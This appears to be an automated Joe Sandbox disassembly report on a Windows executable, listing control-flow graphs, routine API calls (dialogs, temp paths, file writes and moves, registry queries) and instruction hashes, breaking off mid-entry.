                          control_flow_graph 1037 1eb57f-1eb5a5 call 1eb7cd 1040 1eb64c-1eb650 1037->1040 1041 1eb5ab-1eb5b1 1037->1041 1042 1eb667-1eb69c call 1e5602 call 1eb8b5 CreateDialogParamW 1040->1042 1043 1eb652-1eb659 1040->1043 1044 1eb5bb-1eb5eb call 1e3449 call 1faa54 call 1e3449 call 1faa54 1041->1044 1045 1eb5b3-1eb5b6 1041->1045 1061 1eb69e-1eb6a3 IsWindow 1042->1061 1062 1eb6ad-1eb6b6 1042->1062 1043->1042 1046 1eb65b-1eb662 call 1e551e 1043->1046 1073 1eb5ed-1eb611 call 1e3449 call 1faa54 call 1e23e5 call 1e203f 1044->1073 1074 1eb616-1eb647 MessageBoxW call 1e203f * 2 1044->1074 1048 1eb6fc-1eb70a call 21af96 1045->1048 1058 1eb6fa 1046->1058 1058->1048 1061->1062 1064 1eb6a5-1eb6a8 call 1e5472 1061->1064 1065 1eb6f0-1eb6f8 KiUserCallbackDispatcher 1062->1065 1064->1062 1065->1058 1068 1eb6b8-1eb6bb 1065->1068 1071 1eb6bd-1eb6c4 IsWindow 1068->1071 1072 1eb6eb-1eb6ef 1068->1072 1075 1eb6c6-1eb6d5 IsDialogMessageW 1071->1075 1076 1eb6d7-1eb6e5 TranslateMessage DispatchMessageW 1071->1076 1072->1065 1073->1074 1074->1045 1075->1072 1075->1076 1076->1072
                          APIs
                          • MessageBoxW.USER32(?,?,?,00000010), ref: 001EB631
                          • CreateDialogParamW.USER32(00000000,?,?,Function_00005633,00000000), ref: 001EB68B
                          • IsWindow.USER32(00000000), ref: 001EB69F
                          • IsWindow.USER32(?), ref: 001EB6C0
                          • IsDialogMessageW.USER32(?,?), ref: 001EB6CD
                          • TranslateMessage.USER32(?), ref: 001EB6DB
                          • DispatchMessageW.USER32(?), ref: 001EB6E5
                            • Part of subcall function 001E5472: GetSystemMetrics.USER32(00000000), ref: 001E548F
                            • Part of subcall function 001E5472: GetSystemMetrics.USER32(00000001), ref: 001E5495
                            • Part of subcall function 001E5472: GetWindowRect.USER32(?,?), ref: 001E54A1
                            • Part of subcall function 001E5472: SetWindowPos.USER32(?,000000FE,?,?,00000001,?,?,?,?,?,?,?,001E4F63,00000001), ref: 001E54E8
                          • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 001EB6F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: MessageWindow$DialogMetricsSystem$CallbackCreateDispatchDispatcherParamRectTranslateUser
                          • String ID:
                          • API String ID: 1301809395-0
                          • Opcode ID: 28c51fe1c6b36b8b9691f3c9b07937ccca3f62b710030ccf18bd8783f65f8e82
                          • Instruction ID: b6327996e7d22de934d4b263bb526362edb3e99fa492ac6da69272a416ba4427
                          • Opcode Fuzzy Hash: 28c51fe1c6b36b8b9691f3c9b07937ccca3f62b710030ccf18bd8783f65f8e82
                          • Instruction Fuzzy Hash: 69417F71A04A89ABCF14EBB6DCD9CAFB3BDAF58700B504529F512E3091DB34D908CB21

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1088 1f81f0-1f8240 1089 1f8249-1f825a 1088->1089 1090 1f8242-1f8243 EnterCriticalSection 1088->1090 1091 1f83ba-1f83e8 call 21cc90 GetTempPathW 1089->1091 1092 1f8260-1f8266 1089->1092 1090->1089 1106 1f83ee-1f8424 call 21cc90 GetLongPathNameW 1091->1106 1107 1f8620-1f862e 1091->1107 1093 1f839c-1f83aa 1092->1093 1094 1f826c-1f828a 1092->1094 1098 1f83ac-1f83ad LeaveCriticalSection 1093->1098 1099 1f83b3-1f83b5 1093->1099 1096 1f828c-1f8291 1094->1096 1097 1f82b1-1f82b6 1094->1097 1101 1f8295-1f82ac call 21c190 1096->1101 1102 1f8293 1096->1102 1104 1f82bc-1f82c7 1097->1104 1105 1f8663 call 1e2330 1097->1105 1098->1099 1103 1f8639-1f8662 call 21af96 1099->1103 1101->1093 1102->1101 1111 1f82c9-1f82ce 1104->1111 1112 1f82d0-1f82dd 1104->1112 1117 1f8668 call 21f174 1105->1117 1123 1f842a-1f842c 1106->1123 1124 1f8526-1f8540 call 21ef4e 1106->1124 1114 1f8637 1107->1114 1115 1f8630-1f8631 LeaveCriticalSection 1107->1115 1119 1f82ee-1f82f9 1111->1119 1120 1f82df-1f82e4 1112->1120 1121 1f82e6-1f82eb 1112->1121 1114->1103 1115->1114 1131 1f866d call 1e2330 1117->1131 1125 1f82fb-1f82fe 1119->1125 1126 1f8300-1f8306 1119->1126 1120->1119 1121->1119 1123->1124 1128 1f8432-1f8439 1123->1128 1140 1f856d-1f8572 1124->1140 1141 1f8542-1f8547 1124->1141 1129 1f8308-1f831e call 21b1a7 1125->1129 1126->1129 1130 1f832f-1f8331 1126->1130 1134 1f843f-1f845d call 21ef4e 1128->1134 1135 1f8672 call 21b0cd 1128->1135 1129->1117 1150 1f8324-1f832d 1129->1150 1137 1f8333-1f833e call 21b1a7 1130->1137 1138 1f8340 1130->1138 1131->1135 1156 1f845f-1f8464 1134->1156 1157 1f8476-1f847b 1134->1157 1152 1f8677-1f867f call 1e2330 1135->1152 1146 1f8342-1f8367 call 21c710 1137->1146 1138->1146 1151 1f8578-1f8583 1140->1151 1140->1152 1147 1f854b-1f8551 1141->1147 1148 1f8549 1141->1148 1162 1f839a 1146->1162 1163 1f8369-1f8378 1146->1163 1155 1f8557-1f8564 call 21c190 1147->1155 1148->1147 1150->1146 1158 1f858c-1f8599 1151->1158 1159 1f8585-1f858a 1151->1159 1155->1140 1165 1f8468-1f8471 1156->1165 1166 1f8466 1156->1166 1157->1131 1167 1f8481-1f848c 1157->1167 1169 1f859b-1f85a0 1158->1169 1170 1f85a2-1f85a7 1158->1170 1168 1f85aa-1f85b5 1159->1168 1162->1093 1172 1f837a-1f8388 1163->1172 1173 1f8390-1f8397 call 21b1d7 1163->1173 1165->1155 1166->1165 1175 1f848e-1f8493 1167->1175 1176 1f8495-1f84a2 1167->1176 1177 1f85bc-1f85c2 1168->1177 1178 1f85b7-1f85ba 1168->1178 1169->1168 1170->1168 1172->1117 1181 1f838e 1172->1181 1173->1162 1183 1f84b3-1f84be 1175->1183 1184 1f84ab-1f84b0 1176->1184 1185 1f84a4-1f84a9 1176->1185 1179 1f85c4-1f85da call 21b1a7 1177->1179 1180 1f85eb-1f85ed 1177->1180 1178->1179 1179->1117 1198 1f85e0-1f85e9 1179->1198 1188 1f85ef-1f85fa call 21b1a7 1180->1188 1189 1f85fc 1180->1189 1181->1173 1190 1f84c5-1f84cb 1183->1190 1191 1f84c0-1f84c3 1183->1191 1184->1183 1185->1183 1196 1f85fe-1f8618 call 21c710 1188->1196 1189->1196 1192 1f84cd-1f84e3 call 21b1a7 1190->1192 1193 1f84f4-1f84f6 1190->1193 1191->1192 1192->1117 1207 1f84e9-1f84f2 1192->1207 1199 1f84f8-1f8503 call 21b1a7 1193->1199 1200 1f8505 1193->1200 1196->1107 1198->1196 1205 1f8507-1f851e call 21c710 1199->1205 1200->1205 1205->1124 1207->1205
                          APIs
                          • EnterCriticalSection.KERNEL32(00000000,1FE05385), ref: 001F8243
                          • LeaveCriticalSection.KERNEL32(00000000,1FE05385), ref: 001F83AD
                          • GetTempPathW.KERNEL32(00000105,?), ref: 001F83DC
                          • GetLongPathNameW.KERNELBASE(?,?,00000208), ref: 001F8419
                          • _wcslen.LIBCMT ref: 001F844A
                          • _wcslen.LIBCMT ref: 001F852D
                          • LeaveCriticalSection.KERNEL32(00000000), ref: 001F8631
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CriticalSection$LeavePath_wcslen$EnterLongNameTemp
                          • String ID:
                          • API String ID: 1636596023-0
                          • Opcode ID: 32e7f99f99b6a84db97da887f0e3d6ae9fa494dfad0eb7797e1084682c161c8d
                          • Instruction ID: feb19857cb3b52fbf3cc8c84e13bb474c3467db0427328da4c08ddc3e11ca5cd
                          • Opcode Fuzzy Hash: 32e7f99f99b6a84db97da887f0e3d6ae9fa494dfad0eb7797e1084682c161c8d
                          • Instruction Fuzzy Hash: C2D1D7B1A006099FCB14DF74DC94ABE73A8BF45320F210729E626D72E1EF30D9558B91
                          APIs
                          • WriteFile.KERNELBASE(?,?,?,?,00000000,1FE05385,?,?,?), ref: 001F3AEC
                          • GetLastError.KERNEL32 ref: 001F3B28
                          • GetFileSize.KERNEL32(00000000,?), ref: 001F3B43
                          • GetLastError.KERNEL32 ref: 001F3B50
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 001F3C71
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: File$ErrorLastWrite$Size
                          • String ID:
                          • API String ID: 1341956725-0
                          • Opcode ID: e0684755e981fb72576b8dd88da5ba52a358083cfdae899889e7fcc7f19f668b
                          • Instruction ID: 2172750082df9dc4bc4b870c5526b0fa674e1d7f7891d99e955b62fcbe687687
                          • Opcode Fuzzy Hash: e0684755e981fb72576b8dd88da5ba52a358083cfdae899889e7fcc7f19f668b
                          • Instruction Fuzzy Hash: 798172B5A002099FDB18CF65D854BBEBBF4FF49320F10462EF926A7290D774A944CB61
                          APIs
                          • EnterCriticalSection.KERNEL32(?,1FE05385), ref: 001F5C61
                          • InterlockedExchangeAdd.KERNEL32(00000004,00000001), ref: 001F5C7D
                          • LeaveCriticalSection.KERNEL32(?,1FE05385), ref: 001F5CDF
                          • ResetEvent.KERNEL32(?), ref: 001F5D19
                          • ResumeThread.KERNELBASE(00000000), ref: 001F5D25
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterEventExchangeInterlockedLeaveResetResumeThread
                          • String ID:
                          • API String ID: 2882626427-0
                          • Opcode ID: a37306afec1f53fc377743f26fa0867e4618d99823bf52f1f09dfd9661f471b5
                          • Instruction ID: 4523873091c7e8e4c0e3dfc45fbb37e520f1543ad611975da654e0c44c7a1b39
                          • Opcode Fuzzy Hash: a37306afec1f53fc377743f26fa0867e4618d99823bf52f1f09dfd9661f471b5
                          • Instruction Fuzzy Hash: 9931DE71600B089FC724CF68D998F6ABBF9FF05724F104618E66A97791D771E940CB60
                          APIs
                          • LoadLibraryW.KERNELBASE(shlwapi.dll,001E1DFC), ref: 0020147D
                          • GetProcAddress.KERNEL32(00000000,StrCmpLogicalW), ref: 00201492
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: StrCmpLogicalW$shlwapi.dll
                          • API String ID: 2574300362-2138359078
                          • Opcode ID: 4bdb1a09730c55c32bb670ead51d119ad1a8d2117bd418bbfcbb5218db0d03c9
                          • Instruction ID: cd88dd7c66c9b7f8d9354db840c0335a647671bc6f1a015df9e59138f446d2cf
                          • Opcode Fuzzy Hash: 4bdb1a09730c55c32bb670ead51d119ad1a8d2117bd418bbfcbb5218db0d03c9
                          • Instruction Fuzzy Hash: 27D09EB8A603019FDB44CF65BC1D72636E8B74A713F564025E804D29A4E774805CCF21
                          APIs
                          • SetFileAttributesW.KERNELBASE(?,00000000,1FE05385,00000000,00000000,?,?,?,00000000,0022F038,000000FF,?,001F801D), ref: 001F7443
                          • GetFileAttributesW.KERNELBASE(?,1FE05385,?,00000000,?,?,?,?,0022F038,000000FF,?,001F9773), ref: 001F7557
                          • GetFileAttributesW.KERNELBASE(?,?,1FE05385,?,00000000), ref: 001F75A7
                          • MoveFileW.KERNEL32 ref: 001F7674
                          • MoveFileW.KERNEL32(?,?), ref: 001F771D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: File$Attributes$Move
                          • String ID:
                          • API String ID: 3839737484-0
                          • Opcode ID: 7b519338f7fb5dc0c717d218834e80a6c02cb9fa18e12ef45ee8782250df8ae2
                          • Instruction ID: 75148e6904799babe0b4f2416b20f1fffea5cee28dd8f7bb539f633831805109
                          • Opcode Fuzzy Hash: 7b519338f7fb5dc0c717d218834e80a6c02cb9fa18e12ef45ee8782250df8ae2
                          • Instruction Fuzzy Hash: D651E271A14209DFCB14DFA8D988BFEBBB5EF49324F200629E515E72C0D7359A44CBA0
                          APIs
                          • MessageBoxW.USER32(?,?,?,00000024), ref: 001E9485
                          • LoadIconW.USER32(00000000,0000006B), ref: 001E949F
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001E94B5
                          • ShowWindow.USER32(?,00000000), ref: 001E94D4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Message$IconLoadSendShowWindow
                          • String ID:
                          • API String ID: 3466360672-0
                          • Opcode ID: 7403a0aa6521cc14f03bda7ec0916a847679eb12c3ccdd056121a4739dd50d53
                          • Instruction ID: e955cab553320b048b76b617841212b3aeb79c07666980f60e85dbf041b72d96
                          • Opcode Fuzzy Hash: 7403a0aa6521cc14f03bda7ec0916a847679eb12c3ccdd056121a4739dd50d53
                          • Instruction Fuzzy Hash: 7C518370104F849FD725EB72D999AAFB3E9AF54300F00492DF0AB47192DB74A948CB51
                          APIs
                          • __EH_prolog3_catch_GS.LIBCMT ref: 001E74AC
                          • SetFileApisToOEM.KERNEL32 ref: 001E74DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ApisFileH_prolog3_catch_
                          • String ID: !
                          • API String ID: 1726844025-2657877971
                          • Opcode ID: 530af9932abc523745681f75d36ebc8eb9f43585ac295a789ad3f9bd1d1f730b
                          • Instruction ID: 5fc1e225c088c41c028592003e922e8f944c609dd3aef1cb134b07e69997eb6e
                          • Opcode Fuzzy Hash: 530af9932abc523745681f75d36ebc8eb9f43585ac295a789ad3f9bd1d1f730b
                          • Instruction Fuzzy Hash: 76223E31900AA99BDB28EB65CC91BEDB375BF64300F1041A9E44E671D2EF305E89CF51
                          APIs
                          • CreateFileW.KERNELBASE(001EB2CE,40000000,00000001,00000000,00000003,00000001,00000000,1FE05385,?,"&%0),?,?,?,?,0022E648,000000FF), ref: 001F54D5
                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000001,00000000,?,"&%0)), ref: 001F553A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID: "&%0)
                          • API String ID: 823142352-1527271695
                          • Opcode ID: 019602b32bdc660de8564b27d984bc6db0370c59acad2237c84886148495b2a3
                          • Instruction ID: baf5b7b0f159e7394684148c4a113222652d0a662c83b19f1b0c1f738408d7ac
                          • Opcode Fuzzy Hash: 019602b32bdc660de8564b27d984bc6db0370c59acad2237c84886148495b2a3
                          • Instruction Fuzzy Hash: F5418271A10209DFDB10CF68D895BAEB7B6EF49724F204619E621AB2D0D775AA40CF90
                          APIs
                          • CoInitializeEx.OLE32(00000000,00000002,?,?,?,001EB8C3), ref: 001EB8E1
                          • InitCommonControlsEx.COMCTL32(?,?,?,?,001EB8C3), ref: 001EB8F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CommonControlsInitInitialize
                          • String ID:
                          • API String ID: 2247557368-3916222277
                          • Opcode ID: 0fd55832923bc61a9b53ccecc4d8ff16770ee3455c3ad8958cfa0338704d41bc
                          • Instruction ID: d5528bd68d082377c0e27fe27149d7335a548f7c08d411db9428ad6dbd69ab20
                          • Opcode Fuzzy Hash: 0fd55832923bc61a9b53ccecc4d8ff16770ee3455c3ad8958cfa0338704d41bc
                          • Instruction Fuzzy Hash: 89D0C9B054030EBFEB449B90ED4EF4E7EBCEB00709F004144E545A2181D7F06A048B71
                          APIs
                          • CloseHandle.KERNEL32(?,1FE05385,00000007,?,00000000), ref: 001F9D9D
                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000000,08000080,00000000,1FE05385,00000007,?,00000000), ref: 001F9DE3
                          • CreateFileW.KERNEL32(?,?,08000080,00000000,00000000,08000080,00000000), ref: 001F9E45
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CreateFile$CloseHandle
                          • String ID:
                          • API String ID: 1443461169-0
                          • Opcode ID: 1d99cccba8c57204787e2f9730b6b04ea4317a7af977ff9b8f8c8ba8834d93de
                          • Instruction ID: 84c6c72deceef8fd7fc83b82c2ec31b64ec85d3fdfe120c81c98ff2b19cb133b
                          • Opcode Fuzzy Hash: 1d99cccba8c57204787e2f9730b6b04ea4317a7af977ff9b8f8c8ba8834d93de
                          • Instruction Fuzzy Hash: C881B371A10209EFCB14EF68D885BAEBBB5FF49320F204729E625D72D0D730A944CB90
                          APIs
                          • RegCreateKeyExW.KERNELBASE(80000001,?,00000000,002397B8,00000000,000F003F,00000000,?,?), ref: 001E531F
                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?), ref: 001E5378
                          • _wcslen.LIBCMT ref: 001E5388
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CreateQueryValue_wcslen
                          • String ID:
                          • API String ID: 3779561743-0
                          • Opcode ID: 546ec3c484e5f28055c9797be58182eae877c27852fff685e3df26c682623f23
                          • Instruction ID: 7e5c11d7e46e09574a573e48402141c02fa6c609237b8b6305fe6a85d93bef4a
                          • Opcode Fuzzy Hash: 546ec3c484e5f28055c9797be58182eae877c27852fff685e3df26c682623f23
                          • Instruction Fuzzy Hash: DC217172951A1DAFDB24DF54CC49BEEB3B9FF14304F1001AAA515A3181DBB0AE94CBA0
                          APIs
                          • CloseHandle.KERNEL32(?,1FE05385), ref: 001F5B5D
                          • FindCloseChangeNotification.KERNELBASE(1FE05385,1FE05385), ref: 001F5B73
                          • DeleteCriticalSection.KERNEL32(?,1FE05385), ref: 001F5BAD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
